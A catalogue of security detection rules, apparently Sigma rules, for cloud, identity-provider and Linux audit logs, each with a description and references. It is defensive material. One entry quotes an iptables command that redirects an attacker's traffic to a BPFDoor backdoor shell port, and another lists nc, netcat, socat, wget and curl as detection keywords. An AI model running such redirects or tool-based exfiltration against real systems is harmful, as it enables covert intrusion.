Google Cloud Firewall Modified or Deleted Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP). https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html
Google Full Network Traffic Packet Capture Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic. https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging, https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html
Google Cloud Kubernetes Admission Controller Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information. https://cloud.google.com/kubernetes-engine/docs
Google Cloud Kubernetes CronJob Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. https://cloud.google.com/kubernetes-engine/docs, https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/, https://kubernetes.io/docs/concepts/workloads/controllers/job/
Google Cloud Kubernetes RoleBinding Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding. https://github.com/elastic/detection-rules/pull/1267, https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole, https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control, https://kubernetes.io/docs/reference/access-authn-authz/rbac/, https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
Google Cloud Kubernetes Secrets Modified or Deleted Identifies when the Secrets are Modified or Deleted. https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging
Google Cloud Service Account Disabled or Deleted Identifies when a service account is disabled or deleted in Google Cloud. https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
Google Cloud Service Account Modified Identifies when a service account is modified in Google Cloud. https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts
Google Cloud SQL Database Modified or Deleted Detect when a Cloud SQL DB has been modified or deleted. https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update
Google Cloud VPN Tunnel Modified or Deleted Identifies when a VPN Tunnel Modified or Deleted in Google Cloud. https://any-api.com/googleapis_com/compute/docs/vpnTunnels
Google Workspace Application Access Level Modified Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources. https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings, https://support.google.com/a/answer/9261439
Google Workspace Application Removed Detects when an an application is removed from Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST
Google Workspace Granted Domain API Access Detects when an API access service account is granted domain authority. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS
Google Workspace MFA Disabled Detects when multi-factor authentication (MFA) is disabled. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION
Google Workspace Role Modified or Deleted Detects when an a role is modified or deleted in Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
Google Workspace Role Privilege Deleted Detects when an a role privilege is deleted in Google Workspace. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings
Google Workspace User Granted Admin Privileges Detects when an Google Workspace user is granted admin privileges. https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3, https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE
Github Delete Action Invoked Detects delete action in the Github audit logs for codespaces, environment, project and repo. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
Outdated Dependency Or Vulnerability Alert Disabled Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts. This rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories. https://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization
Github High Risk Configuration Disabled Detects when a user disables a critical security feature for an organization. https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions, https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise
Github Fork Private Repositories Setting Enabled/Cleared Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared). https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking
New Github Organization Member Added Detects when a new member is added or invited to a github organization. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions
Github New Secret Created Detects when a user creates action secret for the organization, environment, codespaces or repository. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions
Github Outside Collaborator Detected Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA. https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization
Github Push Protection Bypass Detected Detects when a user bypasses the push protection on a secret detected by secret scanning. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
Github Push Protection Disabled Detects if the push protection feature is disabled for an organization, enterprise, repositories or custom pattern rules. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations, https://thehackernews.com/2024/03/github-rolls-out-default-secret.html
Github Repository/Organization Transferred Detects when a repository or an organization is being transferred to another location. https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository, https://docs.github.com/en/organizations/managing-organization-settings/transferring-organization-ownership, https://docs.github.com/en/migrations, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration
Github Secret Scanning Feature Disabled Detects if the secret scanning feature is disabled for an enterprise or repository. https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning
Github Self Hosted Runner Changes Detected A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context. https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners, https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation
Github SSH Certificate Configuration Changed Detects when changes are made to the SSH certificate configuration of the organization. https://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities, https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority
Azure Login Bypassing Conditional Access Policies Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith. https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/, https://github.com/JumpsecLabs/TokenSmith
Disabling Multi Factor Authentication Detects disabling of Multi Factor Authentication. https://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/
New Federated Domain Added Detects the addition of a new Federated Domain. https://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/, https://o365blog.com/post/aadbackdoor/
New Federated Domain Added - Exchange Detects the addition of a new Federated Domain. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf, https://us-cert.cisa.gov/ncas/alerts/aa21-008a, https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html, https://www.sygnia.co/golden-saml-advisory, https://o365blog.com/post/aadbackdoor/
Activity from Suspicious IP Addresses Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity Performed by Terminated User Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity from Anonymous IP Addresses Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Data Exfiltration to Unsanctioned Apps Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Activity from Infrequent Country Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Impossible Travel Activity Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Logon from a Risky IP Address Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Potential Ransomware Activity Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
PST Export Alert Using eDiscovery Alert Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide
PST Export Alert Using New-ComplianceSearchAction Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud. https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps
Suspicious Inbox Forwarding Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Suspicious OAuth App File Download Activities Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - Unusual Volume of File Deletion Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Microsoft 365 - User Restricted from Sending Email Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email. https://learn.microsoft.com/en-us/defender-cloud-apps/anomaly-detection-policy, https://learn.microsoft.com/en-us/defender-cloud-apps/policy-template-reference
Okta Admin Functions Access Through Proxy Detects access to Okta admin functions through proxy. https://www.beyondtrust.com/blog/entry/okta-support-unit-breach, https://dataconomy.com/2023/10/23/okta-data-breach/, https://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/
Okta Admin Role Assigned to an User or Group Detects when an the Administrator role is assigned to an user or group. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Admin Role Assignment Created Detects when a new admin role assignment is created. Which could be a sign of privilege escalation or persistence https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta API Token Created Detects when a API token is created https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta API Token Revoked Detects when a API Token is revoked. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Application Modified or Deleted Detects when an application is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Application Sign-On Policy Modified or Deleted Detects when an application Sign-on Policy is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta FastPass Phishing Detection Detects when Okta FastPass prevents a known phishing site. https://sec.okta.com/fastpassphishingdetection, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Identity Provider Created Detects when a new identity provider is created for Okta. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
Okta Network Zone Deactivated or Deleted Detects when an Network Zone is Deactivated or Deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta MFA Reset or Deactivated Detects when an attempt at deactivating or resetting MFA. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta New Admin Console Behaviours Detects when Okta identifies new activity in the Admin Console. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
Potential Okta Password in AlternateID Field Detects when a user has potentially entered their password into the username field, which will cause the password to be retained in log files. https://developer.okta.com/docs/reference/api/system-log/, https://www.mitiga.io/blog/how-okta-passwords-can-be-compromised-uncovering-a-risk-to-user-data, https://help.okta.com/en-us/Content/Topics/users-groups-profiles/usgp-create-character-restriction.htm
Okta Policy Rule Modified or Deleted Detects when an Policy Rule is Modified or Deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Policy Modified or Deleted Detects when an Okta policy is modified or deleted. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Security Threat Detected Detects when an security threat is detected in Okta. https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm, https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta Suspicious Activity Reported by End-user Detects when an Okta end-user reports activity by their account as being potentially suspicious. https://developer.okta.com/docs/reference/api/system-log/, https://github.com/okta/workflows-templates/blob/master/workflows/suspicious_activity_reported/readme.md
Okta Unauthorized Access to App Detects when unauthorized access to app occurs. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
Okta User Account Locked Out Detects when an user account is locked out. https://developer.okta.com/docs/reference/api/system-log/, https://developer.okta.com/docs/reference/api/event-types/
New Okta User Created Detects new user account creation https://developer.okta.com/docs/reference/api/event-types/
Okta User Session Start Via An Anonymising Proxy Service Detects when an Okta user session starts where the user is behind an anonymising proxy service. https://developer.okta.com/docs/reference/api/system-log/, https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection
OneLogin User Assumed Another User Detects when an user assumed another user account. https://developers.onelogin.com/api-docs/1/events/event-resource
OneLogin User Account Locked Detects when an user account is locked or suspended. https://developers.onelogin.com/api-docs/1/events/event-resource/
Default Credentials Usage Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists
Host Without Firewall Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Cleartext Protocol Usage Via Netflow Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
Audio Capture Detects attempts to record audio with arecord utility https://linux.die.net/man/1/arecord, https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa
Auditing Configuration Changes on Linux Host Detect changes in auditd configuration files https://github.com/Neo23x0/auditd/blob/master/audit.rules, Self Experience
Binary Padding - Linux Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md
BPFDoor Abnormal Process ID or Lock File Accessed detects BPFDoor .lock and .pid files access in temporary file storage facility https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
Bpfdoor TCP Ports Redirect All TCP traffic on particular port from attacker is routed to different port. ex. '/sbin/iptables -t nat -D PREROUTING -p tcp -s 192.168.1.1 --dport 22 -j REDIRECT --to-ports 42392' The traffic looks like encrypted SSH communications going to TCP port 22, but in reality is being directed to the shell port once it hits the iptables rule for the attacker host only. https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/, https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
Linux Capabilities Discovery Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges. https://man7.org/linux/man-pages/man8/getcap.8.html, https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/, https://mn3m.info/posts/suid-vs-capabilities/, https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099
File Time Attribute Change - Linux Detect file time attribute change to hide new or changes to existing files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
Remove Immutable File Attribute - Auditd Detects removing immutable file attribute. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Clipboard Collection with Xclip Tool - Auditd Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. https://linux.die.net/man/1/xclip, https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/
Clipboard Collection of Image Data with Xclip Tool Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. https://linux.die.net/man/1/xclip
Possible Coin Miner CPU Priority Param Detects command line parameter very often used with coin miners https://xmrig.com/docs/miner/command-line-options
Creation Of An User Account Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files, https://access.redhat.com/articles/4409591#audit-record-types-2, https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
Data Compressed An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/a78b9ed805ab9ea2e422e1aa7741e9407d82d7b1/atomics/T1560.001/T1560.001.md
Data Exfiltration with Wget Detects attempts to post the file with the usage of wget utility. The adversary can bypass the permission restriction with the misconfigured sudo permission for wget utility which could allow them to read files like /etc/shadow. https://linux.die.net/man/1/wget, https://gtfobins.github.io/gtfobins/wget/
Overwriting the File with Dev Zero or Null Detects overwriting (effectively wiping/deleting) of a file. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md
Disable System Firewall Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md, https://firewalld.org/documentation/man-pages/firewall-cmd.html
File or Folder Permissions Change Detects file and folder permission changes. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md
Credentials In Files - Linux Detecting attempts to extract passwords with grep https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
Use Of Hidden Paths Or Files Detects calls to hidden files or files located in hidden directories in NIX systems. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Hidden Files and Directories Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md
Steganography Hide Zip Information in Picture File Detects appending of zip file to image https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/
Linux Keylogging with Pam.d Detect attempt to enable auditing of TTY input https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md, https://linux.die.net/man/8/pam_tty_audit, https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing, https://access.redhat.com/articles/4409591#audit-record-types-2
Modification of ld.so.preload Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md, https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html
Loading of Kernel Module via Insmod Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md, https://linux.die.net/man/8/insmod, https://man7.org/linux/man-pages/man8/kmod.8.html
Logging Configuration Changes on Linux Host Detect changes of syslog daemons configuration files self experience
Masquerading as Linux Crond Process Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed. https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process
Modify System Firewall Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this. https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html, https://blog.aquasec.com/container-security-tnt-container-attack
Linux Network Service Scanning - Auditd Detects enumeration of local or remote network services. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
Network Sniffing - Linux Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
Password Policy Discovery - Linux Detects password policy discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md, https://linux.die.net/man/1/chage, https://man7.org/linux/man-pages/man1/passwd.1.html, https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu
Systemd Service Reload or Start Detects a reload or a start of a service. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
Screen Capture with Import Tool Detects adversary creating screen capture of a desktop with Import Tool. Highly recommended using rule on servers, due to high usage of screenshot utilities on user workstations. ImageMagick must be installed. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://linux.die.net/man/1/import, https://imagemagick.org/
Screen Capture with Xwd Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture, https://linux.die.net/man/1/xwd
Split A File Into Pieces - Linux Detection use of the command "split" to split files into parts and possible transfer. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md
Steganography Hide Files with Steghide Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
Steganography Extract Files with Steghide Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information. https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/
Suspicious C2 Activities Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) https://github.com/Neo23x0/auditd
Suspicious Commands Linux Detects relevant commands often related to malware or hacking activity Internal Research - mostly derived from exploit code including code in MSF
Program Executions in Suspicious Folders Detects program executions in suspicious non-program folders related to malware or hacking activity Internal Research
Suspicious History File Operations - Linux Detects commandline operations on shell history files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
Systemd Service Creation Detects a creation of systemd services which could be used by adversaries to execute malicious code. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md
System Information Discovery - Auditd Detects System Information Discovery commands https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1082/T1082.md
